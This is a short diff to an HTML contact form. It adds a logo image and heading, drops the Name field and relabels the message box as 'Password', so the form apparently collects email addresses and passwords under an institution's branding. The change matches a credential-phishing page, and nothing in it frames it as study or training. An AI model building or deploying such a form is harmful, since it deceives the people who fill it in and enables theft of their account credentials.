--- a/index.html
+++ b/index.html
@@ -27,13 +27,13 @@
     </script>
 </head>
 <body>
+    <img src="uio.jpg" alt="Logo" width="380" height="100">
+    <h1>Contact Form</h1>
     <form id="contact-form">
         <input type="hidden" name="contact_number">
-        <label>Name</label>
-        <input type="text" name="user_name">
         <label>Email</label>
         <input type="email" name="user_email">
-        <label>Message</label>
+        <label>Password</label>
         <textarea name="message"></textarea>
         <input type="submit" value="Send">
     </form>
